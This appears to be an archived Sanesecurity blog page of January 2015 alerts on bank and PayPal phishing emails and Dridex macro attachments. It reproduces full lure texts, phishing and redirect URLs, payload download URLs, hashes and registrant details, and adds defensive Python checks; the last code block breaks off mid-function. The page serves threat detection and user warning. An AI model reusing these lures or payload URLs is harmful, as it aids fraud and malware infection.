Saturday, 31 January 2015

You Have One Security Message NatWest CreditCard

Alert Summary:

Phishing: 'You Have One Security Message From NatWest CreditCard' emails claiming that a security message is waiting for you and asking you to log in to read it.

Sample Message headers:
From: NatWest CreditCard {CreditCardOnlineServices@cards.natwest.com}
Subject: You Have One Security Message From NatWest CreditCard
Sample Message body:


Dear Customer,

You Have One Security Message From NatWest CreditCard Online Services center.

Log in below to view your message.

https://cardservices.natwest.com/RBSG_Consumer/Login.do?promoCode=NatWest

Thank you for banking with us.
Paul Riley
Head of Credit Cards

Please don't reply to this email. It is for notification only as this mailbox cannot
accept incoming mail. If you need to contact us then use the number on the
back of your credit card. You can also find useful telephone numbers by going to www.natwest.com/cardservices and selecting the 'Contact Us' link
The link in the email displays the genuine cardservices.natwest.com address as its text, but it actually takes you to a website hosting a redirect page:
http://surdolog.by/css.php
The redirect page then takes you to this domain, which hosts the phishing site:
http://diamondsandmuffins.com/app/NatWest.html?https://cardservices.natwest.com/RBSG_Consumer/Login.do?promoCode=NatWest
Note that the genuine NatWest login URL appears only after the '?', as the query string; the page is served by diamondsandmuffins.com.

The fake phishing site above looks like this:



Cheers,
Steve
Sanesecurity.com

Friday, 30 January 2015

The credit card we have on file for your PayPal service was declined

'The credit card we have on file for your PayPal service was declined' phishing emails are arriving.

Headers:
From: "PayPal" {secure.p@ypl.com}
Subject: Account Access Information

Message body:
Dear member,
The credit card we have on file for your PayPal service was declined when we attempted to bill you on 01/30/2015 for your most recent service fees.
For this reason, your service could be suspended.

You must update your billing information immediately in order to avoid any interruption to your services.
Once your credit card information is updated, you will be charged immediately, as soon as payment is received.
You can update your credit card simply by download the form attached in email Thanks.

Libby Barr

Managing Director, Customer Service

The email carries an HTML attachment containing the fake PayPal login page (note the doubled extension in the filename):
Acount.html.html

Once you arrive at the fake site, you are asked to log in and provide details:




Cheers,

Steve
Sanesecurity.com

Garth Hutchison, BACS Transfer : Remittance for JSAG400GBP




The 'Garth Hutchison, BACS Transfer : Remittance for JSAG400GBP' run mentioned earlier on the blog now carries a faked, back-dated Date: header (highlighted in yellow in the original post). The Date: header claims the message was written on Wed, 21 Jan 2015, but the receiving server's own Received: line shows it arriving on Fri, 30 Jan 2015, nine days later. The sending host also has no reverse DNS ("unknown") and is unrelated to the blumenthal.com domain shown in the From: header.

The User-Agent header claims Thunderbird 24.2.0, released 10 December 2013, so over a year out of date at the time.
Headers:
Received: from static.vdc.vn (unknown [113.161.83.216])
    by plf-01.keele.netcentral.co.uk (Postfix) with ESMTP id 29DDA1DFC1B
    for {xxx@xxx.co.uk}; Fri, 30 Jan 2015 10:10:58 +0000 (GMT)
Message-ID: {0FXOYQ31.8814156@blumenthal.com}
Date: Wed, 21 Jan 2015 06:50:20 -0500
From: "Garth Hutchison" {accmng2556@blumenthal.com}
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Thunderbird/24.2.0
MIME-Version: 1.0

Subject: BACS Transfer : Remittance for JSAG400GBP
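The back-dating described above is easy to check mechanically: compare the sender-supplied Date: header with the timestamp your own MTA stamped into the newest Received: line, and pull the HELO name, reverse DNS and IP out of that same line. The following is an added example, not code from the Sanesecurity post; the sample message is constructed from the headers quoted above, with angle brackets restored, a placeholder recipient, and the body line from the post.

```python
import email
import re
from datetime import timedelta
from email.utils import parsedate_to_datetime

# Constructed sample modelled on the headers quoted in the post. The topmost
# Received: line is the one added by the recipient's own mail server, so its
# timestamp is the only one the sender could not forge.
SAMPLE = """\
Received: from static.vdc.vn (unknown [113.161.83.216])
    by plf-01.keele.netcentral.co.uk (Postfix) with ESMTP id 29DDA1DFC1B
    for <xxx@xxx.co.uk>; Fri, 30 Jan 2015 10:10:58 +0000 (GMT)
Message-ID: <0FXOYQ31.8814156@blumenthal.com>
Date: Wed, 21 Jan 2015 06:50:20 -0500
From: "Garth Hutchison" <accmng2556@blumenthal.com>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Thunderbird/24.2.0
MIME-Version: 1.0
Subject: BACS Transfer : Remittance for JSAG400GBP

We have arranged a BACS transfer to your bank for the following amount : 5821.00
"""

# "from <helo> (<reverse-dns> [<ip>])" as Postfix writes it.
_FROM_CLAUSE = re.compile(r"from\s+(\S+)\s+\((\S+)\s+\[([^\]]+)\]\)")


def newest_received(raw: str) -> str:
    """The first Received: header in the message is the one added last."""
    msg = email.message_from_string(raw)
    return msg.get_all("Received")[0]


def received_timestamp(received_header: str):
    """The timestamp of a Received: line is everything after the final ';'."""
    return parsedate_to_datetime(received_header.rsplit(";", 1)[-1].strip())


def date_skew(raw: str) -> timedelta:
    """Delivery time (from our MTA's Received: line) minus the claimed Date:.
    Both values are timezone-aware, so differing offsets are handled."""
    msg = email.message_from_string(raw)
    claimed = parsedate_to_datetime(msg["Date"])
    delivered = received_timestamp(newest_received(raw))
    return delivered - claimed


def is_backdated(raw: str, tolerance: timedelta = timedelta(days=2)) -> bool:
    """True when the Date: header is older than delivery by more than `tolerance`.
    A couple of days covers queueing and clock drift; nine days does not."""
    return date_skew(raw) > tolerance


def sending_host(raw: str):
    """(HELO name, reverse DNS as seen by our MTA, connecting IP) or None."""
    m = _FROM_CLAUSE.search(newest_received(raw))
    return m.groups() if m else None


if __name__ == "__main__":
    print("skew:", date_skew(SAMPLE), "backdated:", is_backdated(SAMPLE))
    print("sender:", sending_host(SAMPLE))
```

On the sample this reports a skew of eight days and change, and a connecting host whose reverse DNS is "unknown"; either on its own is a useful scoring signal, and the pair together is a strong one.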




BACS Transfer : Remittance for JSAG400GBP Garth Hutchison

'BACS Transfer : Remittance for JSAG400GBP' emails purporting to come from Garth Hutchison are being spammed out, carrying a Word document with an embedded macro.

These emails aren't from Garth Hutchison at all; the name is just being used to make the email look more genuine, i.e. as if it came from a real company.
Note
It's also worth remembering that the company itself may have no knowledge of this email or its link(s) or attachment, as it won't have come from their servers and IT systems but from an external botnet.

It's not advised to ring them, as there won't really be anything they can do to help you.

Message Header: (Note: the reference number in the subject and the invoice number in the filename are random)

From: "Garth Hutchison" {accmng2556@blumenthal.com}
Subject: BACS Transfer : Remittance for JSAG400GBP
Message Body:
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.
 Attachment filename (word document with macros):

BACS_transfer_JS87123781237.doc
Md5 Hashes:
6001ed1e009de1a5f9021b613da7de60 [1]
f9d2458458dd49e9ce7c9894c540c4d5 [2]

Malware Macro document information:

VirusTotal Report [1] (hits 0/57 Virus Scanners)

VirusTotal Report [2] (hits 0/57 Virus Scanners)

Malwr Report [1]

Malwr Report [2]

Decoded Macro [1]

Decoded Macro [2]



Sanesecurity signatures are blocking this as:

Sanesecurity.Malware.24676.DocHeur

NOTE

The current round of Word and Excel attachments is targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside them.

The file the macro auto-downloads is normally a Windows executable, so it will not currently run on any operating system apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will then put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal your bank account login information (by key logging, taking screenshots automatically, or copying information from your clipboard).

Cheers,
Steve

Me new photo / Hola mi foto malware

'Me new photo' / 'Hola mi foto' malware arriving as an HTML email with an .exe attachment:


Headers:
From:     "Juliya" {cognitionih53@supernatuaralworks.com}
Subject: Me new photo ;)
Subject: Hola mi foto

Message body1:

Me new photo ;)

Message body2:
hola mi foto :)


The attachment is a Windows executable:
my_new_photo_4327489327498237498239.exe

Md5 Hashes:
66412807813f54108d7b011f1ede6893
Malware Information:
VirusTotal Report [1] ( detected by 3/57 Virus Scanners)

Malwr Report [1]

  • Executed a process and injected code into it, probably while unpacking
  • Installs itself for autorun at Windows startup


Hybrid-Analysis Report [1]

Cheers,

Steve
Sanesecurity.com

Thursday, 29 January 2015

INTERNAL FAX You have received a new fax

'INTERNAL FAX: You have received a new fax' emails are being spammed out carrying a Zip file. The From: address is spoofed (fax@bbc.co.uk), and the fax number in the filename differs between the body text, the zip and the executable inside it.


Message Header:


From: "INTERNAL FAX" {fax@bbc.co.uk}
Subject: You have received a new fax

You have received fax from EPSON91208382 at

Scan date: Thu, 29 Jan 2015 06:40:24 -0600

Number of page(s): 28

Resolution: 400x400 DPI

Name: fax167087861.pdf

_________________________________
Attached file is scanned image in PDF format
 Attachment filename:

fax167045861_pdf.zip
Inside the Zip file is a Windows executable (a .scr screensaver, with '_pdf' in the name so that it passes for a PDF):

fax167987861_pdf.scr

Md5 Hashes:
31ee9b03837f432faaa259cf0c15e94a    [1]

Malware  information:

VirusTotal Report [1] (hits 1/57 Virus Scanners)

Malwr Report [1]

  • Performs some HTTP requests
  • The binary likely contains encrypted or compressed data.
  • Steals private information from local Internet browsers
  • Creates an Alternate Data Stream (ADS)
  • Installs itself for autorun at Windows startup

Hybrid-Analysis Report [1]

Cheers,
Steve

Santander Bank Secure Notification Phish

Alert Summary:

Phishing: Santander Bank Secure Notification emails saying that you need to confirm your online banking details.

Sample Message headers:
To: Recipients {e-Documents.cs@sb.mobi}
From: "Santander  Bank  UK" {e-Documents.cs@sb.mobi}
Subject: Santander Bank Secure Notification
Sample Message body:
Valued Customer,

Please note that starting from January 24, 2015 we will be introducing new online banking authentication procedures in order to protect the private information of all online banking users.

You are required to confirm your online banking details with us as you will not be able to have access to your accounts until this has been done.

As you're already registered for online banking all you need to do is to confirm your online banking details.

Confirm your details

Once you've completed this you'll be able to manage your money whenever you want, giving you more control of your finances.

Regards
Customer Service
Santander Alert Team
The 'Confirm your details' link takes you to a website hosting a redirect page:
http://leopard-sports.com/rev.htm
The redirect page then takes you to this domain, which hosts the phishing site:
http://www.sex-pleasuretoys.co.uk/image/data/santander/BtoChannelDriver.ssobto.html?dfpioudsfdav.santana.co.uk
The 'santana.co.uk' string after the '?' is only the query string; the page is served by sex-pleasuretoys.co.uk.

The fake phishing site above looks like this:



Cheers,
Steve
Sanesecurity.com

Garth Hutchison BACS Transfer : Remittance for JSAG400GBP

'Garth Hutchison BACS Transfer : Remittance for JSAG400GBP' emails are being spammed out, carrying a Word document with an embedded macro.

These emails aren't from Garth Hutchison at all; the name is just being used to make the email look more genuine, i.e. as if it came from a real company.
Note
It's also worth remembering that the company itself may have no knowledge of this email or its link(s) or attachment, as it won't have come from their servers and IT systems but from an external botnet.

It's not advised to ring them, as there won't really be anything they can do to help you.

Message Header: (Note: the reference number in the subject and the invoice number in the filename are random)

From: "Garth Hutchison" {accmng2556@blumenthal.com}
Subject: BACS Transfer : Remittance for JSAG400GBP
Message Body:
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.
 Attachment filename (word document with macros):

BACS_transfer_JS87123781237.doc
Md5 Hashes:
9530153534ced23bfac0416ad9cd2dc8 [1]
f84be9bda869daac41466b9519a89b65 [2]
cf79d1931d39863995aaf9e874575ee6 [3]

Malware Macro document information:

VirusTotal Report [1] (hits 0/57 Virus Scanners)

VirusTotal Report [2] (hits 0/57 Virus Scanners)

VirusTotal Report [3] (hits 0/57 Virus Scanners)

Malwr Report [1]

Malwr Report [2]

Malwr Report [3]

Decoded Macro [1]

Decoded Macro [2]

Decoded Macro [3]



Sanesecurity signatures are blocking this as:

Sanesecurity.Malware.24676.DocHeur

NOTE

The current round of Word and Excel attachments is targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside them.

The file the macro auto-downloads is normally a Windows executable, so it will not currently run on any operating system apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will then put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal your bank account login information (by key logging, taking screenshots automatically, or copying information from your clipboard).

Cheers,
Steve

Invoice #10413 from SPOTLESS CLEANING

'Invoice #10413 from SPOTLESS CLEANING' emails are being spammed out, carrying a Word document with an embedded macro.

These emails aren't from SPOTLESS CLEANING at all; the name is just being used to make the email look more genuine, i.e. as if it came from a real company.
Note
It's also worth remembering that the company itself may have no knowledge of this email or its link(s) or attachment, as it won't have come from their servers and IT systems but from an external botnet.

It's not advised to ring them, as there won't really be anything they can do to help you.

Message Header: (Note: the invoice number is random)

From: paulamatos@btinternet.com
Subject: Invoice #10413 from SPOTLESS CLEANING
Message Body:
This message contains Invoice #10413 from SPOTLESS CLEANING.  If you have questions about the contents of this message or Invoice, please contact SPOTLESS CLEANING.

SPOTLESS CLEANING
GLYNDEL HOUSE
BOWER LANE
DA4 0AJ

07956 379907
 Attachment filename (word document with macros):

SPOTLESS CLEANING-Invoice-10413.doc
Md5 Hashes:
9530153534ced23bfac0416ad9cd2dc8 [1]
f84be9bda869daac41466b9519a89b65 [2]
cf79d1931d39863995aaf9e874575ee6 [3]

Malware Macro document information:

VirusTotal Report [1] (hits 0/57 Virus Scanners)

VirusTotal Report [2] (hits 0/57 Virus Scanners)

VirusTotal Report [3] (hits 0/57 Virus Scanners)

Malwr Report [1]

Malwr Report [2]

Malwr Report [3]

Decoded Macro [1]

Decoded Macro [2]

Decoded Macro [3]

Payload Info:

Thanks to Dave:
Downloads hXXp://162.251.84.122/js/bin.exe as %TEMP%\hDnyDA.exe

md5 Hash: 600d1d0fa82c58e54f83d3b9917616e7 [4]

VirusTotal Report [4] (hits 2/57 Virus Scanners)

Malwr Report [4]

 Hybrid-Analysis Report [4]

Contacts Hosts:

IP               Port   Proto   Country
185.48.56.72     80     TCP     United Kingdom
91.234.92.252    8080   TCP     Bulgaria
5.135.28.105     80     TCP     France

Sanesecurity signatures are blocking this as:

Sanesecurity.Malware.24676.DocHeur

NOTE

The current round of Word and Excel attachments is targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside them.

The file the macro auto-downloads is normally a Windows executable, so it will not currently run on any operating system apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will then put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal your bank account login information (by key logging, taking screenshots automatically, or copying information from your clipboard).

Cheers,
Steve

Wednesday, 28 January 2015

Ctb-locker cab file malware

Cab file Ctb-locker malware on the loose....

Headers: (example)
Subject: Zion Pentecostal Church
Message body (example)
Zion Pentecostal Church
865 3rd av, Rivers, MB R0K 1X0

CANADA
204-314-7471
Attached to the email is a CAB file (Examples)
carrieres_de_lestuaire.cab
dodd_engineering_ltd.cab
industriestr_16_57076_siegen.cab
ing_thomas_teubl_and_ing_herbert_teubl_baugesmbh.cab
the_vein_institute_of_toronto.cab
zins_david_dr.cab
zion_pentecostal_church.cab

Inside each CAB file is a Windows executable (.scr) named to match the CAB; for the_vein_institute_of_toronto.cab that is:
the_vein_institute_of_toronto.scr

Md5 Hashes:
1873939f2b6ea98d0617a56ce0c2b0c6  [1]

Others (MD5 of each CAB file; note that the first hash is only 31 hex digits as published, so it is incomplete):

2f30ff2449ee4dc2707c6d6e1380233   carrieres_de_lestuaire.cab
092e4eba24b6e8add9ac2c7fe4f3ea79  dodd_engineering_ltd.cab
8f307e9cee602263ac1c4f8ed5d83df3  industriestr_16_57076_siegen.cab
3219aa4c435105bafa45d14bb9237a22  ing_thomas_teubl_and_ing_herbert_teubl_baugesmbh.cab
f2da91034128ca52b9dc08d9d1b5fcb5  the_vein_institute_of_toronto.cab
c2aa7dfc29269e1f3d1e0738679c5fb2  zins_david_dr.cab
457ae42e7a30d5273565d5ea45aca108  zion_pentecostal_church.cab

Malware Information:

VirusTotal Report [1] (hits 1/57 Virus Scanners)

Malwr Report [1]


Hybrid Analysis Report [1]

Cheers,

Steve
Sanesecurity.com

Log in to PayPal to resolve a limitation on your account

'Log in to PayPal to resolve a limitation on your account' phishing emails are arriving.

Headers:
From: "PayPal" {dequeue@sbcglobal.net}
Subject: Recently, there's been activity in your account that seems unusual compared to your normal account activities.
Subject: Update Your Information
Subject: Log in to PayPal to resolve a limitation on your account

Message body:
Account Status Update
Update account information
Response required
Upon receipt
Log in to PayPal to resolve a limitation on your account
Dear Client,

Recently, there's been activity in your account that seems uncommon compared to your normal account activities. Please log in to confirm your identity and update your account Personal details.

To help protect your account, no one can send money or withdraw money. In addition, no one can close your account, send refunds, remove any bank accounts, or remove credit cards.

What's going on?
We're concerned that someone is using your account without your knowledge. Recent activity on your account seems to have occurred from a suspicious location or under circumstances that may be different than usual.

What do I do?
Log in to your account as soon as possible. We may ask you to confirm information you provided when you created your account to make sure that you're the account holder.
update your information

What's next?
Once you've completed all the tasks, we'll remove all restrictions immediately.
forgot password

The fake PayPal link (note that the URL contains nothing resembling 'paypal' at all):
http://icoi.org.ve/mapsoqr

Once you arrive at the fake site, you are asked to log in:



Cheers,

Steve
Sanesecurity.com

America Airlines Your Order APPROVED attached ticket word doc

'America Airlines Your Order APPROVED' emails with an attached 'ticket' are being spammed out, carrying a Word document with an embedded macro.

These emails aren't from the airline at all; the name is just being used to make the email look more genuine, i.e. as if it came from a real company.
Note
It's also worth remembering that the company itself may have no knowledge of this email or its link(s) or attachment, as it won't have come from their servers and IT systems but from an external botnet.

It's not advised to ring them, as there won't really be anything they can do to help you.


Message Header: (Note: the order number is random)

From: "America Airlines" {tickets@aa.com}
Subject: Your Order#221188583 - APPROVED
Message Body:
Dear Customer,

Your credit card has been successfully processed.

FLIGHT NUMBER RY9451124US
ELECTRONIC 231697388
DATE & TIME / January 28th, 2015, 10:30 AM
ARRIVING / Washington
TOTAL PRICE / 480.77 USD

Please print your attached ticket.

For more information regarding your order, contact us by visiting : https://www.aa.com/contactAA/viewContactAAAccess.do?session=RY634542US


Thank you
America Airlines.
 Attachment filename (word document with macros):

20152701-7203849_ticket.doc
Md5 Hashes:
5c7f88a4d34620b07368b64c9dd2ff12   [1]

Malware Macro document information:

VirusTotal Report [1] (hits 3/57 Virus Scanners)

Malwr Report [1]

Hybrid-Analysis Report [1]


Sanesecurity signatures are blocking this as:

Sanesecurity.Malware.24676.DocHeur

NOTE

The current round of Word and Excel attachments is targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside them.

The file the macro auto-downloads is normally a Windows executable, so it will not currently run on any operating system apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will then put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal your bank account login information (by key logging, taking screenshots automatically, or copying information from your clipboard).

Cheers,
Steve

workntrades.com scam

workntrades.com - another "money making" scam, from the same people behind the one covered earlier on this blog.

Various Message Headers:
Subject: Hello!
Subject: Hi!
Subject: It's a very good thing
Subject: it's fantastic
Subject: Please look it
Subject: Special for you

Message Body:
Hi,

I guarantee that you will never ever look for other money making methods
after you watch this presentation!

Exceed your wildest financial goals NOW:

=> www.workntrades.com

Regards
Whois information for the domain (registered on 26 January 2015, only two days before this post):
Domain Name: WORKNTRADES.COM
Registrar: BIZCN.COM, INC.
Sponsoring Registrar IANA ID: 471
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS1.THEATRECONDO.NET
Name Server: NS2.THEATRECONDO.NET
Updated Date: 26-jan-2015
Creation Date: 26-jan-2015
Expiration Date: 26-jan-2016
Domain name: workntrades.com
Registry Domain ID: 1898316731_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.bizcn.com
Registrar URL: http://www.bizcn.com
Updated Date: 2015-01-26T16:53:54Z
Creation Date: 2015-01-26T16:53:52Z
Registrar Registration Expiration Date: 2016-01-26T16:53:52Z
Registrar: Bizcn.com,Inc.
Registrar IANA ID: 471
Registrar Abuse Contact Email: abuse@bizcn.com
Registrar Abuse Contact Phone: +86.5922577888
Reseller: Cnobin Technology HK Limited
Registry Registrant ID: 
Registrant Name: Joseph Maudlin
Registrant Organization: Joseph N. Maudlin
Registrant Street: 2963 Doe Meadow Drive
Registrant City: Washington
Registrant State/Province: MD
Registrant Postal Code: 20004
Registrant Country: us
Registrant Phone: +1.3015563018
Registrant Phone Ext: 
Registrant Fax: +1.3015563018
Registrant Fax Ext: 
Registrant Email: info@workntrades.com

Here's the website you land on, offering to "help" you with a "$500 a day" incentive:

Cheers,

Steve
Sanesecurity.com

Phishing Your Account - Barclays www1-barclays.com

Alert Summary:

Phishing: 'Your Account - Barclays' emails, linking to www1-barclays.com, saying that the bank holds mismatched information about you.

Sample Message headers:
From: Barclays {barclays@support.com}
Subject: Your Account - Barclays
Sample Message body:
Imροrtant Νοtice    
      
Dear Mr xxxxxxx,   
      
Τhis email οriginates frοm an autοmated system that detects when we haνe mismatched infοrmatiοn regarding a custοmer οr their accοunt. We may haνe cοntacted yοu already regarding this issue, if sο please ignοre this email. Ιt is essentiaΙ hοweνer, that we hοld the cοrrect infοrmatiοn as we use this infοrmatiοn tο νerify yοur identity whenever yοu call us οr perfοrm transactiοns οnline.    
      
 If yοu fail tο νerify yοur accοunt we may place a limitatiοn οn the serνices yοu access such as οnline and telephοne banκing and to avoid any further inconvenience we advise that you update these details within 24 hours.   
      
To begin the process simply click the link below.   
      
Get Started   
      
Ρlease nοte: Υου may alsο νerιfy yουr accουnt by νisiting yουr nearest branch. Tο lοcate yουr nearest branch please νisit ουr website


The 'Get Started' link doesn't take you to Barclays but instead to a URL shortener:
http://tiny.cc/barclays2
The URL redirector then takes you to this domain, which hosts the phishing site:
http://www1-barclays.com/olb/auth/start.phpe

The fake phishing site looks like this:

At first glance it looks like the genuine barclays.com, but look closely at the address: www1-barclays.com, a separate domain that merely contains the word "barclays".

The fake "BARCLAYS" domain was set up on 25 January 2015, three days before this post; whois details here:
Domain Name: WWW1-BARCLAYS.COM
Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Sponsoring Registrar IANA ID: 303
Whois Server: whois.PublicDomainRegistry.com
Referral URL: http://www.PublicDomainRegistry.com
Name Server: RS133.REGISTRAR-SERVERS.COM
Name Server: RS33.REGISTRAR-SERVERS.COM
Updated Date: 25-jan-2015
Creation Date: 25-jan-2015
Expiration Date: 25-jan-2016

Domain Name: WWW1-BARCLAYS.COM
Registry Domain ID: 
Registrar WHOIS Server: whois.publicdomainregistry.com
Registrar URL: www.publicdomainregistry.com
Updated Date: 2015-01-25T19:27:29Z
Creation Date: 2015-01-25T19:27:28Z
Registrar Registration Expiration Date: 2016-01-25T19:27:28Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
Registrar Abuse Contact Phone: +1-2013775952
Registry Registrant ID: 
Registrant Name: David Ayeni
Registrant Organization: N/A
Registrant Street: 132 Victoria Road   
Registrant City: London
Registrant State/Province: London
Registrant Postal Code: RM1 2NX
Registrant Country: GB
Registrant Phone: +44.02039483949
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: davidayeni823@gmail.com
Registry Admin ID: 

The fake phishing site will also ask you to hand over more details...

Cheers,

Steve
Sanesecurity.com

Windsor Flowers Accounts Invoice Sheet1

'Windsor Flowers Accounts Invoice 1385' emails are being spammed out, carrying a Word document with an embedded macro.

These emails aren't from Windsor Flowers at all; the name is just being used to make the email look more genuine, i.e. as if it came from a real company.
Note
It's also worth remembering that the company itself may have no knowledge of this email or its link(s) or attachment, as it won't have come from their servers and IT systems but from an external botnet.

It's not advised to ring them, as there won't really be anything they can do to help you.
Company:

Welcome to Windsor Flowers, your local florist in London, offering an array of beautiful flower arrangements and bouquets.

Message Header: (Note: the Invoice number is random)

From: Windsor Flowers Accounts {windsorflowersaccounts@hotmail.com}
Subject: Windsor Flowers Invoice 1385
Message Body:
Dear Accounts payable

Please see attached invoice 1385 for flowers within January 15.
Our bank details can be found at the bottom of the invoice.
If paying via transfer please reference our invoice number.

If you have any queries, please do not hesitate to contact me.

Many thanks in advance

Connie


Windsor Flowers
74 Leadenhall Market
London
EC3 V1LT
Tel: 020 7606 4277
www.windsorflowerslondon.co.uk
 Attachment filename (word document with macros):

Windsor Flowers Invoice 1385 Sheet1.doc
Md5 Hashes: (updated from earlier blog entry)
526f452d0442c6e2c59d8b0ea50a2222 [1]
770d6b25accb9cdc1b7f3421d9e5d201 [2]

Malware Macro document information:

VirusTotal Report [1] (hits 0/57 Virus Scanners)

VirusTotal Report [2] (hits 0/57 Virus Scanners)


Sanesecurity signatures are blocking this as:

Sanesecurity.Malware.24676.DocHeur

NOTE

The current round of Word and Excel attachments is targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside them.

The file the macro auto-downloads is normally a Windows executable, so it will not currently run on any operating system apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will then put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal your bank account login information (by key logging, taking screenshots automatically, or copying information from your clipboard).

Cheers,
Steve

RBS Morning commentary malware

RBS Morning commentary malware:

Headers:
From: "RBS.COM" {no-replay@rbs.com}
Subject: RBS Morning commentary
Message body:
PLEASE REFER TO THE DETAILS BELOW IF YOU ARE HAVING PROBLEMS READING THE ATTACHED FILE.

 Please do not contact your Treasury Centre for technical issues - these
should be routed to RBS FM support.

The attached file is in zip format; first you have to unzip it
(self-extracting archive, Adobe PDF) and then it can be viewed in Adobe
Acrobat Reader 3.0 or above. If you do not have a copy of the software
please contact your technical support department.

ALL SUMMARIES OF RESEARCH REPORTS INCLUDED IN THIS PAGE CONSTITUTE PART
OF THE RELEVANT REPORT WHICH IS ATTACHED AND ARE THEREFORE COVERED BY
THAT DOCUMENT'S DISCLAIMER AND DISTRIBUTION RESTRICTIONS.

Attached to the email is a ZIP file:
attachment3237001.zip

Inside the zip is a Windows executable (not the self-extracting PDF the body describes):
attachment.exe

Md5 Hashes:
cb2e98722e485cdf926f66451e57f2fa [1]

Malware Information:

VirusTotal Report [1] (hits 2/57 Virus Scanners)

Malwr Report [1]


Hybrid Analysis Report [1]

Cheers,

Steve
Sanesecurity.com

Accounts Invoice 1385 Windsor Flowers

'Accounts Invoice 1385 Windsor Flowers' emails containing a Word document with an embedded macro.

A quick update to the earlier blog entry with the macro's payload:

Payload  (Thanks to Leigh Hall for the information):
Connects to: hxxp://vivercomrequinte.com.br/js/bin.exe
Creates file: %TEMP%\sdfsdferfwe.exe

Payload Md5 Hashes:
9b1df8529ce85a0d9ccd5378afb7cbaf   [1]

Payload Analysis:

VirusTotal Report [1] (hits 2/57 Virus Scanners)


Malwr Report [1]


Hybrid-Analysis Report [1]

Connects to host located in:

France, Bulgaria, United Kingdom, Bulgaria, France, Romania, Korea Republic of

Cheers,
Steve

update your Halifax account experian credit file phish


'Update your Halifax account' / Experian credit file phish:

Headers:
From: "Experian - Halifax Online"{experian@securesite.net}
Subject: update your Halifax account
Message body:
Dear Customer,

It has been reported to us by experian that some of our customers'
could find their Experian credit file does not reflect this due to an IT blunder at the bank.

Though Experian says the glitch means customers "may have missed out on positive data"
that might have increased their ability to get credit elsewhere.

In particular those upgrading from Halifax's basic bank account
- the Easycash Halifax bank account -
to a Reward Current Account may be adversely affected by the problem.

but in order for no one to be left out, we are requesting an account update
from all our customers, attached to this message is a form containing all
neccessary fields to enable us rectify this problem, please download and fill
all the form as all fields are required.

Thanks.
Attached to the email is an HTML file containing the phishing form itself, so there is no link to click and no URL to block:
Halifax Online Update Form.html

The fake html phishing site looks like this...





Cheers,

Steve
Sanesecurity.com

Wysłane z mojego iPhone przez Tapatalk foto

'Wysłane z mojego iPhone przez Tapatalk' (Polish for 'Sent from my iPhone via Tapatalk') malware:

Headers:
Subject: Wysłane z mojego iPhone
Message body:
foto
Wysłane z mojego iPhone przez Tapatalk

Attached to the email is a ZIP file:
5ugshabe_foto_jpeg.zip

Inside the zip is a Windows executable (note the dual extension: 'jpeg' in the name, .exe as the real extension):
5ugshabe_foto_jpeg.exe
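Every executable attachment on this page uses the same naming trick: a decoy document or image word in front of the real extension (fax167987861_pdf.scr, 5ugshabe_foto_jpeg.exe, the .scr files inside the CTB-locker CABs) or a doubled extension (Acount.html.html). The following is an added example, not code from the Sanesecurity post, of a name check that covers all of those forms and of applying it to the members of a zip attachment without extracting them. The zip it inspects is constructed in the block (a dummy member holding only an MZ header), and the extension and decoy lists are an assumption of the example, not a complete list.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Extensions Windows will run on double-click regardless of the icon shown.
# Assumed list for the example; extend it for your own gateway.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js",
                   ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".cpl"}
# Words used as the "decoy" half of a lure name (fax..._pdf.scr, ..._foto_jpeg.exe).
DECOY_WORDS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png",
               "gif", "txt", "zip"}


def suspicious_name(name: str) -> list:
    """Reasons a single attachment or archive-member name looks like a lure.
    An empty list means nothing was found."""
    p = PurePosixPath(name.replace("\\", "/"))
    reasons = []
    ext = p.suffix.lower()
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {ext}")
    # Split the stem on '_' and '.' so "fax167987861_pdf" -> ["fax167987861", "pdf"]
    tokens = [t.lower() for t in p.stem.replace(".", "_").split("_")]
    if tokens and tokens[-1] in DECOY_WORDS:
        reasons.append(f"decoy word '{tokens[-1]}' before the real extension")
    if len(p.suffixes) > 1:
        reasons.append("double extension " + "".join(p.suffixes))
    return reasons


def inspect_zip(data: bytes) -> dict:
    """Map each file member of a zip attachment to its reasons, reading only
    the central directory (nothing is extracted or executed)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {info.filename: suspicious_name(info.filename)
                for info in zf.infolist() if not info.is_dir()}


def build_sample_zip(member: str) -> bytes:
    """Constructed stand-in for the spammed attachment: one dummy member whose
    content is just an MZ header and padding, not real malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
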